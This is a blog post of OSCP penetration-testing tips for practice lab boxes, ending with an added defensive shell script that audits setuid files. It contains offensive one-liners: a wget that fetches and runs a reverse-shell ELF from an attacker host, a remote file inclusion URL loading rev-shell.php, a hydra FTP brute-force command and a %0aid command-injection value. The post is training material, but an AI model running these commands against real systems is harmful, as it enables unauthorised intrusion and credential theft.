blakejarvis.com

OSCP - Things to Try When Stuck

Stuck on a box? Try the ideas below, which I learned from OSCP practice boxes.

Initial Access

Web discovery

  • Try http://site/[hostname] if you can't find a directory or piece of software you think should exist.
  • Try both GET and POST for every URL you find; the server may be blocking data sent via a particular HTTP method.
  • Fuzz parameters with ffuf.
  • Examine response headers for minor custom errors.

Getting a shell

  • To save time, upload a web shell instead of manually executing PHP commands.
  • Some PHP local file inclusion vulnerabilities can also reference remote resources with ?path=http://[kali ip]/rev-shell.php.
  • Break an exploit into steps. Use Wireshark to watch for an ICMP ping back to your machine instead of going for a reverse shell right away.
  • Instead of sending a full reverse shell payload, download an ELF, make it executable, and run it in one command: wget -P /tmp http://kali/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf
  • If a CMS has an RCE, look closely at what is affected and where it's implemented. If the proof-of-concept URL contains /skins/, check for that functionality in the admin panel or in the online documentation.
  • When calling back on a port (web request, shell, etc.), try multiple ports if the first fails.
  • Piece together multiple initial access exploits. If one creates a web account, then tries for a shell and fails, add exit(0) to the Python script right after the account is created and use the credentials in another exploit.
  • Use the same ports the box already has open for shell callbacks.
  • Try at least 4 ports, plus a ping, when trying to get a callback.
  • If you can control data that is read by the server, always consider deserialization.
  • Always test payloads locally, especially if the vulnerability is blind.
  • Consider where you can write data that is later read back by the server.

General

  • Don't spin your wheels on other routes if a 10-point box has a known exploit straight to root.
  • Check version numbers to make sure something isn't a decoy.
  • Consider similar protocols. If you get an SSH key, try using it over SCP.
  • Type version numbers carefully!
  • For hydra, always use -e nsr (try a null password, the login name, and the reversed login name). Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ftp -vV -f -e nsr -I
  • Look for auth-owners in nmap output to get usernames.
  • FTP: always run the client from a writable directory on Kali so downloads succeed.
  • FTP: brute force the "admin" account.
  • Search the Metasploit modules for ideas: https://github.com/rapid7/metasploit-framework
  • Search a software's GitHub page for version files that give specific information.
  • See Proving Grounds' Dibble for Node.js RCE.
  • Review the page source of every page for commented-out areas.
  • Guess parameters. If there's a POST to forgot_pass.php with an email param, try GET /forgot_pass.php?email=%0aid.
  • Parameter/command injection fuzzing:
  • When brute forcing credentials, guess the software name as both the username and the password.
  • When dealing with file type upload checks, try supplying just the magic header, e.g. GIF89a;. Files pulled from Google Images may have been re-encoded and not be identified as a GIF.

Windows Privilege Escalation

  • Explore the root of the C:\ drive. Some scheduled tasks that can't be seen as a low-level user may have their files located at C:\.
  • Always test a reverse shell on a Windows box when attempting to get a shell.
  • Explore alternatives to a reverse shell. Leverage exposed remote access protocols. For example, if a reverse shell doesn't work, execute a command that changes the Administrator password and then use smbexec to authenticate.
  • Identify all users. Attempt to brute force authentication via RDP.
  • Always check "C:\program files" and "C:\program files (x86)" for installed apps.

Linux Privilege Escalation

  • Privesc scripts aren't always right:
    • e.g. a decoy entry exists in the crontab while sudo -l reveals a process dumper that can be used to pull credentials from memory.
  • If a process dumper is available, don't Google too deep. See if there are custom "password" processes to target.
  • su root is the best way to switch to root if you have the password but aren't in the root group.
  • Identify all users. Attempt to brute force SSH authentication if /home or /etc/passwd can be pulled.
  • Always run echo $PATH to show available command locations.
  • Docker: see Proving Grounds' Sirol/Escape box.
  • If a user is in a group, it's probably for a reason.
  • Fully understand any software related to a user's group (e.g. the fail2ban group).
  • Use pspy to spy on processes and cron jobs you may not otherwise be able to see.
  • Run groups.
  • Run cat ~/.profile && cat ~/.bashrc.
  • If running as www-data, always inspect the contents of the html directory or the application, and look for commented-out passwords.
  • If another user exists, always try su [user] with no password and with their username as the password.
  • Check /var/backups.
  • Custom SUID binaries won't be highlighted, as linpeas and other privesc scripts don't know what they are.
    • Examine each and every SUID!
  • Run linux-smart-enumeration/lse.sh as a backup privilege escalation script.
  • Files with caps / capabilities: see Proving Grounds' Escape box.
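The flip side of the "custom SUIDs" point above, as an added example that is not from the original post: a POSIX shell audit that lists every setuid/setgid file under a tree and flags anything missing from a known-good baseline, which is how a defender spots the custom binaries that generic privesc scripts don't recognise. The demo tree, file names and baseline it uses are constructed for the example.

```shell
# Added example (not from the original post): audit setuid/setgid files under
# a tree against a known-good baseline so that custom SUID binaries, which
# generic privesc scripts don't recognise, stand out on their own.
# The demo tree, file names and baseline below are constructed for the demo.

# find_suid DIR: print every setuid or setgid regular file under DIR,
# as a sorted list of paths relative to DIR.
find_suid() {
    ( cd "$1" && find . -type f \( -perm -4000 -o -perm -2000 \) | sed 's|^\./||' | sort )
}

# unexpected_suid DIR BASELINE: print setuid/setgid files under DIR whose
# relative path is not listed in BASELINE (one path per line).
# Returns 0 when nothing unexpected is found, 1 otherwise.
unexpected_suid() {
    # -x whole line, -F fixed strings, -f patterns from file, -v invert match
    extra=$(find_suid "$1" | grep -vxFf "$2" || true)
    [ -z "$extra" ] && return 0
    printf '%s\n' "$extra"
    return 1
}

# demo_tree: build a small constructed filesystem image in a temp directory
# (two baseline setuid files, one custom one, one plain file) and print its path.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/opt/app"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"   # in baseline
    : > "$d/usr/bin/su";     chmod 4755 "$d/usr/bin/su"       # in baseline
    : > "$d/opt/app/helper"; chmod 4755 "$d/opt/app/helper"   # custom SUID
    : > "$d/usr/bin/ls";     chmod 0755 "$d/usr/bin/ls"       # not setuid
    printf 'usr/bin/passwd\nusr/bin/su\n' > "$d/baseline.txt"
    echo "$d"
}

# Usage: audit the constructed tree; only opt/app/helper should be reported.
tree=$(demo_tree)
unexpected_suid "$tree" "$tree/baseline.txt" || echo "unexpected setuid/setgid file(s) listed above"
rm -rf "$tree"
```

On a real host, run find_suid / against a baseline captured from a freshly built image of the same distribution and treat every extra entry as something to examine by hand.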